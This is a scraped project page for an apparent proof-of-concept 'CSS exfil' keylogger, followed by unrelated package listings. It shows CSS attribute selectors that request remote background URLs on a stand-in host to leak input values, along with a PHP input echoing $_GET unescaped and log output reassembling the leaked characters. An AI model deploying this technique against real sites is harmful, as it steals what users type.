CSS Exfil helper script to generate injected CSS and corresponding HTML (inspired by mike gualtieri)

Related tags

Laravel css-exfill
Overview

The PoC-CSS Exfill Basic Keylogger

First of all i was developing bot stuff and i seen attribute=value] [target=_blank] in source code of website. This method stuck in my mind. Because we can get access all of element that has _blank attribute. Than i made a search about how can i demonstrate this selector. For example: #username[value="admin"]{ background:url("https://something.host/"); } It means i can put malicious code. To explain further i can do it more usefull. For example: #username[value*="aa"]~#aa{background:url("https://something.host/aa"); <input type="text" id="username" name="username" value="<? php echo $_GET['username']; ?>" /> <input id="form_submit" type="submit" value="submit"/> <a id="aa">

When a user enters any string consisting of the letters like 'a' specific elements will be styled with a non-existent background image at a remote attacker URL.

There are 3 conditions

  1. Parsed data must be ready while page is rendered.
  2. We must have at least one CSS Selector.
  3. The element must have to CSS property which takes a URL, background, background-image and etc.

1 USAGE

http://127.0.0.1/css-exfilphp?username=abab
Output will be:

  • [Wed Mar 30 19:58:44 2022] 127.0.0.1:52588 [404]: GET /a_ - No such file or directory
  • [Wed Mar 30 19:58:44 2022] 127.0.0.1:52589 [404]: GET /ab - No such file or directory
  • [Wed Mar 30 19:58:44 2022] 127.0.0.1:52590 [404]: GET /ba - No such file or directory
  • [Wed Mar 30 19:58:44 2022] 127.0.0.1:52591 [404]: GET /_b - No such file or directory

If we re-assemble this output:


  • a #a_
  • b #b_
  • ab #ab
  • aba #ba
  • abab #_b
You might also like...
An opinionated support package for Laravel, that provides flexible and reusable helper methods and traits for commonly used functionality.

Support An opinionated support package for Laravel, that provides flexible and reusable helper methods and traits for commonly used functionality. Ins

SEO Helper is a package that provides tools and helpers for SEO (Search Engine Optimization).

SEO Helper By ARCANEDEV© SEO Helper is a package that provides tools and helpers for SEO (Search Engine Optimization). Feel free to check out the rele

Helper class for working with Laravel Mix in WordPress themes and plugins.

Hybrid\Mix Hybrid Mix is a class for working with Lavarel Mix. It adds helper methods for quickly grabbing asset files cached in the mix-manifest.json

Live Helper Chat - live support for your website. Featuring web and mobile apps, Voice & Video & ScreenShare. Supports Telegram, Twilio (whatsapp), Facebook messenger including building a bot.

Live helper chat It's an open-source powered application, which brings simplicity and usability in one place. With live helper chat you can bring live

This package provides new helper functions that take care of handling all the translation hassle and do it for you.

Laravel Translate Message ūü•≥ This package provides new helper functions that take care of handling all the translation hassle and do it for you. Insta

A convenient helper for using the laravel-seo package with Filament Admin and Forms
A convenient helper for using the laravel-seo package with Filament Admin and Forms

Combine the power of Laravel SEO and Filament PHP. This package is a convenient helper for using the laravel-seo package with Filament Admin and Forms

Localization Helper - Package for convenient work with Laravel's localization features and fast language files generation
Localization Helper - Package for convenient work with Laravel's localization features and fast language files generation

Localization Helper Package for convenient work with Laravel's localization features and fast language files generation. Installation Via Composer $ c

A Composer script to lint a Travis CI configuration file.

composer-travis-lint composer-travis-lint is a Composer script that lints a project/micro-package its Travis CI configuration aka its .travis.yml file

Script em PHP que gera uma chamada 'click-to-call' quando preenchemos um formul√°rio na web, utilizando o asterisk.

;----------------------------------------------------------------------------------------------------------------------------; ; Scrip em PHP que gera

Owner
Ahsen
Developer
Ahsen
Cache-purge-helper - Additional instances where nginx-helper and lscache plugin should be purged.

cache-purge-helper Additional instances where nginx-helper and lscache plugin should be purged. Install Extract the zip file. Upload them to /wp-conte

Jordan 10 Oct 5, 2022
A helper package to flash a bootstrap alert to the browser via a Facade or a helper function.

Alert Box (Laravel) A helper package to flash a bootstrap alert to the browser via a Facade or a helper function. <div class="alert alert-info fade in

Ben-Piet O'Callaghan 17 Dec 30, 2022
Laravel helper to generate the QRcode for ZATCA E-Invoicing system

Laravel-ZATCA Unofficial package to implement ZATCA QRcode for E-Invoicing. Requirements PHP >= 7.4 An mbstring extension Dependencies chillerlan/php-

Moh. Php Master .. 3 Aug 16, 2022
Boilerplate code for protecting a form with proof of work. Uses javascript in the browser to generate the hashcash and PHP on the server to generate the puzzle and validate the proof of work.

Boilerplate code for protecting a form with proof of work. Uses javascript in the browser to generate the hashcash and PHP on the server to generate the puzzle and validate the proof of work.

Jameson Lopp 28 Dec 19, 2022
Generate trends for your models. Easily generate charts or reports.

Laravel Trend Generate trends for your models. Easily generate charts or reports. Support us Like our work? You can support us by purchasing one of ou

Flowframe 139 Dec 27, 2022
Html-sanitizer - The HtmlSanitizer component provides an object-oriented API to sanitize untrusted HTML input for safe insertion into a document's DOM.

HtmlSanitizer Component The HtmlSanitizer component provides an object-oriented API to sanitize untrusted HTML input for safe insertion into a documen

Symfony 201 Dec 23, 2022
Loja virtual fictícia para compra de produtos e estilização dos mesmos. Desenvolvido com as tecnologias: HTML, CSS, PHP, CODEIGNITER, JavaScript, Bootstrap e Mysql.

StampGeek Loja virtual fictícia para compra de produtos e estilização dos mesmos. Desenvolvido com as tecnologias: HTML, CSS, PHP, CODEIGNITER, JavaSc

Pablo Silva 1 Jan 13, 2022
Integrates the Trix Editor with Laravel. Inspired by the Action Text gem from Rails.

Integrates the Trix Editor with Laravel. Inspired by the Action Text gem from Rails. Installation You can install the package via composer: composer r

Tony Messias 267 Jan 4, 2023
This package provides a console command to convert dynamic JS/CSS to static JS/CSS assets.

Laravel Nova Search This package provides a console command to convert dynamic JS/CSS to static JS/CSS assets. Requirements laravel-mix v6.0+ php 7.3+

Akki Khare 3 Jul 19, 2022
ūüĒĆ Convert Bootstrap CSS code to Tailwind CSS code

Tailwindo This tool can convert Your CSS framework (currently Bootstrap) classes in HTML/PHP (any of your choice) files to equivalent Tailwind CSS cla

Awssat 938 Dec 24, 2022